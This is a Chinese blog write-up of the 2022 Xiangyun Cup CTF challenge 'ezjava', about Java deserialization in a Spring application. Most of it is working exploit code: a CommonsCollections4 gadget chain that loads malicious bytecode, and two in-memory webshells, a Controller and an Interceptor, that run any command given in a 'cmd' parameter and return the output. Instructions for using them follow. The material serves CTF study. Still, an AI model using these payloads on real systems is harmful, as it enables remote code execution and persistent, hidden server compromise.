[祥云杯 2022]ezjava

最新推荐文章于 2024-03-18 08:58:00 发布
最新推荐文章于 2024-03-18 08:58:00 发布
阅读量1k 收藏 1
点赞数
分类专栏: WP CTF 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/127682566
版权
CTF 同时被 2 个专栏收录
23 篇文章 1 订阅
订阅专栏
WP
20 篇文章 1 订阅
订阅专栏

前言

比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。

复现

package com.ctf.ezjava.controller;

import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class Hello {
    public Hello() {
    }

    @GetMapping({"/hello"})
    public String hello() {
        return "hello";
    }

    @PostMapping({"/myTest"})
    public String myTest(@RequestBody String baseStr) {
        try {
            byte[] decode = Base64.getDecoder().decode(baseStr);
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decode));
            ois.readObject();
            return "true";
        } catch (Exception var4) {
            System.out.println(var4);
            return "false";
        }
    }
}

有个反序列化入口,并且项目里有commons-collections4-4.0.jar依赖,直接打CC2或CC4就行,但卡在了两个地方:

绕过@RequestBody

其实也不算是绕过,主要知识储备不够导致的。

Demo

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class TestController {
    @RequestMapping("/test")
    public String test(String name){
        System.out.println(name);
        return name;
    }
}

不加@RequestBody时,当请求localhost:8081/test?name=Sentiment后,name的值是Sentiment
在这里插入图片描述

而若加上@RequestBody后,此时在请求localhost:8081/test?name=Sentiment后,name的值就变成了name=Sentiment,也就是上了前边的name=,明显前半段内容是我们不想要的,而若不传name=只传后边的Sentiment又传不进去
在这里插入图片描述

所以就需要把内容类型直接改成text/plain,这样就可以直接传值了,构造CC4的链尝试攻击,成功弹出计算器

在这里插入图片描述

但是本题环境不止本地环境如此,题目环境是一个不出网的环境,无法反弹shell,所以还需要构造内存马

内存马构造

这里有个注意点,由于使用CC4的攻击方式,而CC4是通过动态加载字节码的,所以在构造恶意字节码文件时需要继承AbstractTranslet, 之前提到过

Controller内存马

package com.sentiment.controller;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;

public class TestController extends AbstractTranslet {
    static {
        try {
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE", 0);

            // 2. 从context中获得 RequestMappingHandlerMapping 的实例
            RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

            // 3. 通过反射获得自定义 controller 中的 Method 对象
            Method method = TestController.class.getMethod("test");

            // 4. 在内存中动态注册 controller
            RequestMappingInfo info = new RequestMappingInfo(null, null, null, null, null, null,
                    null);

            TestController injectToController = new TestController();
            mappingHandlerMapping.registerMapping(info, injectToController, method);

        } catch (NoSuchMethodException e) {
            throw new RuntimeException(e);
        }

    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    @ResponseBody
    public String test() throws Exception {
        // 获取request
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

        InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        InputStreamReader isr = new InputStreamReader(is, "UTF-8");
        BufferedReader br = new BufferedReader(isr);
        String str = "";
        String line = "";

        while ((line = br.readLine())!=null){
            str+=line;
        }
        is.close();
        br.close();
        return str;
    }
}

Interceptor内存马

package com.sentiment.controller;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.handler.MappedInterceptor;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Field;
import java.util.ArrayList;

public class TestInterceptor extends AbstractTranslet implements HandlerInterceptor{
    static {
        try{
            // 1. 获取上下文环境
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

            // 2. 通过上下文获取RequestMappingHandlerMapping
            RequestMappingHandlerMapping  mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

            // 3、反射获取adaptedInterceptors属性
            Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
            field.setAccessible(true);
            ArrayList<HandlerInterceptor> adaptedInterceptors = (ArrayList<HandlerInterceptor>)field.get(mappingHandlerMapping);

            //4、生成MappedInterceptor对象
            MappedInterceptor mappedInterceptor = new MappedInterceptor(null,null,new TestInterceptor());

            // 5、添加到adaptedInterceptors中
            adaptedInterceptors.add(mappedInterceptor);

       } catch (NoSuchFieldException e) {
           e.printStackTrace();
        } catch (IllegalAccessException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        InputStreamReader isr = new InputStreamReader(is, "UTF-8");
        BufferedReader br = new BufferedReader(isr);
        String str = "";
        String line = "";

        while ((line = br.readLine())!=null){
            str+=line;
        }
        is.close();
        br.close();
        response.getWriter().write(str);
        return false;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

CC4

package CommonsCollections4;


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;

import java.util.PriorityQueue;

public class CC4Test {

    public static void main(String[] args) throws Exception {
        FileInputStream fis =new FileInputStream("D:\\TestController.class");
        byte[] bs = new byte[fis.available()];
        fis.read(bs);
        Templates templates = new TemplatesImpl();
        setFieldValue(templates,"_name","Sentiment");
        setFieldValue(templates,"_bytecodes",new byte[][]{bs});



        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);


        TransformingComparator transformingComparator=new TransformingComparator(new ConstantTransformer<>(1));

        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(0);

        Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);

        serialize(priorityQueue);
        //unserialize("1.txt");
        }


    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
        out.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream In = new ObjectInputStream(new FileInputStream(Filename));
        Object o = In.readObject();
        return o;
    }
}

controller

构造好后,通过/myTest传进去,再?cmd=shell执行命令
在这里插入图片描述

Interceptor

通过拦截器执行命令,所以访问/myTest生成内存马后,再/myTest?cmd=shell执行命令,或者访问hello触发拦截器也可

S1nJa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Github:ez java学习
03-06
我做的第一件事 这是非常基础的Java东西 我发布我需要的项目和东西,这里的一切都是我制造的,除非它在开始时有一个@author,我会把它们归功于它!!! 示例:C
CTF祥云2022-1030-真题
11-01
CTF祥云2022-1030-真题
祥云2022 writeup
渗透测试研究中心
11-02 1836
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
2023安洵 ezjava
最新发布
qq_64201116的博客
03-18 810
主要就是这两个依赖,有一个CB,和一个postgresql​​postgresql可以看到有几个cve最熟悉的就是cve202221724这个了发现目标不出网,所以只能利用写文件的那个,刚好有一个ftl模板注入可以利用​接下来就是CB了,CB可以触发任意的getter,链子如下:​而且java的版本是。
祥云2022 pwn - bitheap
z1r0的博客
11-01 398
需要注意的是d60这个函数,经过调试之后可以得知传入的内容需要使用二进制来表示,所以就写了一个decode。2.27下的off-by-one,其实也可以看成off-by-null。接下来就是板子直接套 2.27的off-by-null。
祥云2022 pwn - leak
z1r0的博客
11-08 414
wjh师傅的思路是利用botcake的方法,将unsortedbin和tcache重叠,使得unsortedbin的fd落到tcache的fd,再修改最后两字节,进行libc上地址的申请,可以申请到global_max_fast和stdout,这里由于地址随机化肯定是需要爆破的。算好size之后,delete掉,此时目标地址就会指向堆地址,从而实现了向地址中写入堆地址,因为flag在堆地址里,所以就可以泄露出flag,exp就用的wjh师傅的。当时比赛没有做出来,光顾着泄露libc地址去了。
【pwn】2022 祥云 部分wp
woodwhale的博客
10-31 1179
2022 祥云 pwn 部分wp,有空复现别的题目
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
第二届祥云 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
中式祥云图案矢量
07-25
中式祥云图案矢量适用于祥云图案设计的AI格式素材。
NSS [NUSTCTF 2022 新生赛]Ezjava1
Jay17的博客
08-30 791
NSS [NUSTCTF 2022 新生赛]Ezjava1
【Polarctf】web ezjava
xsx213的博客
10-13 183
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
BugKu_ez_java_serialize
qq_53460654的博客
12-20 643
简单的一道java反序列化题
PolarCTF WEB题目 ezjava WP
weixin_62257805的博客
10-13 412
Polar CTF WEB题目之ezjava -SPEL注入wp
【BUGKU之ez_java_serialize】
qq_40646572的博客
04-12 5083
BUGKU之java反序列化练习
CTF学习Java反序列化
why811的博客
08-18 801
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
CTF攻防赛java反编译题
qq_40872999的博客
09-10 2113
CTF攻防赛java反编译题Reverse.class已知Reverse.class文件 Reverse.class 已知Reverse.class文件 打开方式:idea,eclipse等java工具,记事本打开乱码 // // Source code recreated from a .class file by IntelliJ IDEA // (powered by Fernflower ...
CTFjava反序列-2020-网鼎-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3548
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
在关卡「玉兔祥云」中,如果一次游玩(中途不复活)共计燃放了 10 10 枚烟花,则会令关卡最后一个场景切换为新场景(一次游玩最多燃放 10 10 枚烟花)。 陈佳雨现在在玩这一关,现在她知道她一共通了这一关 � x 次(在现实中,陈佳雨不可能通关这一关的),并且她知道她一共燃放了 � y 枚烟花,但是她玩得太投入,不知道触发了几次新场景,请你分别计算出来最少和最多触发场景次数。 输入格式 一行,两个整数 � , � x,y。 输出格式 一行,两个整数,分别为最少次数和最多次数。
07-08
对于最少触发场景次数,我们可以假设每次通关都刚好燃放了10枚烟花。那么最少触发场景次数就是燃放的烟花数除以10的结果。 对于最多触发场景次数,我们可以假设前x-1次通关都刚好燃放了10枚烟花,最后一次通关燃放的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值